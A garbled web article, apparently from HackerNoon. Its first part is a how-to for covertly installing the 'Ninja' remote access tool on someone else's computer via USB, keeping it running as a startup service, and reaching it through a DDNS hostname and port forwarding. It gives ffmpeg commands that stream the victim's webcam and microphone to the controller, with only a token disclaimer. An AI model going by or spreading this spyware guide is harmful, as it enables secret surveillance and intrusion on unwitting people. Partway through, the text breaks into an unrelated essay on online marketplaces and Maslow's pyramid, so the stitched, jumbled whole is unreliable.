In this article, I'll show you how to watch any computer webcam and listen to the mic (live) using the remote access tool as your highly skilled spy! Ninja All you need is to set up Ninja on a USB and take 10 seconds to insert it to the target computer, click on Ninja installer (will take 1 second to install), and done! Now you can watch webcam and screen, listen to the mic and audio output and literally do anything on the target computer from anywhere. This article is for informational purposes only and was created to educate about this vulnerability. HackerNoon does not promote spyware or hacking in anyway and hope that this content can teach people how to defend against such attacks by learning how they work. Important Disclaimer and Content Notice: So, What's Ninja? A general-purpose fully customizable software to control a remote computer behind any NAT, Firewall, and proxy. Providing secure shell access, file transfer, and shell stream (stream shell output from remote to a local file) This means you can literally do anything on a remote computer that has running on it. So why not use it as spyware! You can gain full control of the computer without even being noticed. All you need is to install Ninja as a service to make sure it will always be running and will start at startup Ninja The first step, Download Ninja So first we should download, extract and configure Ninja, you can download a (with included) from here : single-click Ninja installer for windows FFmpeg Ninja single click windows installer (+ FFmpeg) Note that this installer will install Ninja in and name the service . So the Ninja won't be able to communicate with the controller computer anymore. Setup A Hostname There are few ways to get a stable hostname: you can get a DDNS hostname easily and for free from services like and Dynamic DNS (DDNS): No-IP DuckDNS you can purchase a VPS and use its IP address or hostname VPS: Static IP Domain Name So the first option (DDNS) is the best I can offer, it's free and easy. The next three options are all paid. Also, the VPS option has the downside that you'll have to always use it to control your Ninja. Here we'll use first option, so let's set it up! Get A DDNS Hostname You can use free dynamic DNS services like and to get a hostname. It's very easy and straightforward. All you need is to create an account, create a hostname and set your network's (controller computer network's) IP address as its IP. To find your IP address, you can simply search in google ( ) No-IP DuckDNS my IP on controller computer with no VPN It might be annoying to find your IP address, open the DDNS provider website and set it on your hostname every time your IP changes. That's why s (Dynamic Update Client) exist. You can download a DUC, install it on your (controller) computer and it will update your hostname with your IP whenever it changes. No-IP has its own DUC, not sure about DuckDNS DUC Alright, if you got the hostname and set it in the Ninja config file, it's time to meet an Elite Ninja (Jonin) Download Jonin Ninja will be your spy on the remote computer but you'll need some commander to communicate with and command the Ninja. That's where comes in Jonin (meaning elite Ninja!) So first, you'll need to download and extract Jonin on the controller computer: Download Jonin Then open the config file in and change the to match with Ninja's port config/constants.json port }, } { // connection port "PORTS" : { "DATA" : 3707 //.... The Jonin computer should have the communication port open, so you should forward the port on your router. There are many guides on the web, from No-IP is a nice one this one Also if your ISP uses some NAT, you should ask them to change your NAT type, rather change it to (note that this NAT type is less secure than others, not a big deal though), in order to let incoming packets (Ninja messages in this case) into your network open Install Ninja On Target Now that everything is set up, it's time to sneak! Copy all files of the extracted and configured Ninja installer into a USB drive. All you need after is 10 seconds to install it on target. Once you got it, insert a USB drive, click on Servicifier executable (better run as administrator), click on when prompted to Yes allow the app to make changes and that's it! now you can go back to your computer and ask to command your ! Jonin Ninja(s) Record Webcam and Mic Now that your Ninja has sneaked into the target, let the hacking begin! First, open Jonin, press any key until you arrive on the console. Then type: to get a list of your Ninjas (only one in this case) list , to connect to Ninja 1 connect 1 and then to switch to reverse shell access change cmd Now type this command to list all DirectShow devices: FFmpeg\ffmpeg -list_devices true -f dshow -i dummy Find camera and mic devices in the list: Next, type and then to switch to shell stream command type. Finally, type this command which will stream camera and mic into and any error will go into . After running this command, you'll see file names with szie of data streamed to each (you can press to end stream): change cmd-stream G:/cam.mkv G:/cam-err.txt Esc @FFmpeg\ffmpeg -f dshow -i video="Lenovo EasyCamera":audio="Microphone Array (2- Realtek High Definition Audio)" -f matroska -@G:/cam.mkv@G:/cam-err.txt@ You see I have 10 MB of video streamed into . From the grand markets of Venice and Bazaars of Istanbul to today’s Amazon and Alibaba, the core concept remains: are relevant because they serve both the sellers and buyers at scale. They help both find each other (discoverability) and give the seller a means to thrive (monetization). building marketplaces In the old days, you’d have to travel far to get what you wanted. Nowadays you have “buy now” buttons that order products from the other side of the world straight to your front door. Fast forward to 2020, Amazon is now turning 36 years old. Several new waves have come and we are possibly at the peak “Uber for X/Gig economy” stage. We are posing questions such as what good is the gig economy for the gigster? How profitable and sustainable is it to drive people from A to B, do check-ins for BnBs or deliver your food? There’s now a new wave of non-commoditized service and knowledge skills coming to the web. These are skills that lie not in fulfilling basic needs but rather noble pursuits and highly specialized project executioners such as teaching cooking skills on Masterclass.com, creating and selling crafty leather wallets on Etsy.com. Or even craft beer classes on skillshare.com? That seems to be where we are now arriving to, in force, in the 2020s. This phenomenon has been called the Passion Economy. It’s about individual knowledge-intensive skills, not commoditized task fulfilment. Why the Maslow Pyramid of Needs matters The well known Maslow pyramid of needs represents a person’s basic needs. From survival and sustenance to prestige and love. As those needs are met people strive to attain the next higher levels of the pyramid. The same happened with civilization. The need for cereals and vegetables by sheepherders brought about basic trade, say sheep for vegetables. As there was no more trading to do people went further away in order to trade their produce. This gradually put people in contact for the benefit of fulfilling needs — which was achieved by these trade transactions. Source: simplypsychology.org Our Basic Needs With the passage of time (helped by good weather, peace, fertile land and open borders) gradually trade routes are established. This creates a strong foothold in the “ section of the Pyramid as basic commodities travel from where there is a surplus to where there is a lack thereof for small sums. Basic Needs” Today people still trying to get a foothold on the Basic Needs segment are those unlucky to be in a part of the world that is barely integrated into modern trade routes. Think of war or drought-stricken parts of Africa. Or those in the developed world without differential skills, doing odd jobs to pay for food, rent, medical bills. The overall feeling is that they do not possess the means to live well, but rather survive. Such people are condemned to the worst jobs. local Our Psychological Needs The second tier of the pyramid is . It is related to the first in the sense that, with the basic needs attained, one can live outside the “survival mode”. This allows them to contribute to society and have some breathing space to enjoy and pursue relationships. Psychological Needs We‘d put this on par with working to pay bills like rent and a car. Having a middle income allows for a certain feeling of accomplishment within the country. Generally speaking people in this echelon are employed in service jobs that are integrated within the global economy. Our Self-Fulfilment Needs Finally, the upper echelon of the pyramid, the part, deals with something else entirely. It focusses on living not for sustainability and paying bills but for pleasure. Participants are highly skilled professionals with large disposable incomes directly contributing to the global market or to the local market in a highly globalised country. These people pursue their quests in accumulation, travel, highly specialized knowledge, artistry and being global citizens. Individuality and global audience mean disproportionate rewards in terms of audience, prestige and skill monetization. Self Fulfillment If the correlation isn’t between the global marketplace and the Maslow Pyramid think of scale The bigger the audience the bigger scale in rewards. People who can only look to fulfil Basic Needs have jobs that service the local economy (think street cleaners, coffee shop workers, subsistence farmers). People who participate indirectly in the global market have middle incomes and strive to attain Psychological Needs (think call centre clerks, bankers, teachers). People who participate directly in the global market are those who own the companies that trade globally or individually serve a large audience (artists, architects, freelancers, entrepreneurs, bloggers). Interestingly, as we shall see, the history of the internet has mimicked this upward flow. Now it is reaching the top tip of the pyramid which is a promising development. The evolution of the web marketplaces: From Craigslist to Amazon, Uber and now… The 2010s proved the internet as serious business. It did so as technology companies finally outpaced the likes of AT&T, GE, EXXON MOBIL, JPMorgan to the absolute crown. Amazon, Alibaba, Microsoft, Apple, Facebook and Google are now the behemoths of the world. They are the global companies that once banks were, the appeal is wholly now on working for such companies, not banks. 1995 onward: The Yellow Pages/ Phone Book When the web had up to 200 million users, the first listing sites such as Craigslist which emulated the yellow pages phone directory. You would use these to look for a gardener, a plumber or even a date (though likely not the best place for the latter). This served the first and foremost problem on the web: Having something to say or to sell and being found. Web classifieds showed for the first time, to many, that there could be business on the internet. Listings couldn’t, however, sell anything. Nor could they take a cut, as they simply listed suppliers and derived any business from sponsored highlights. 1999s onward: E-commerce Amazon, Netflix and Alibaba Around the turn of the millennium new apps began to appear.
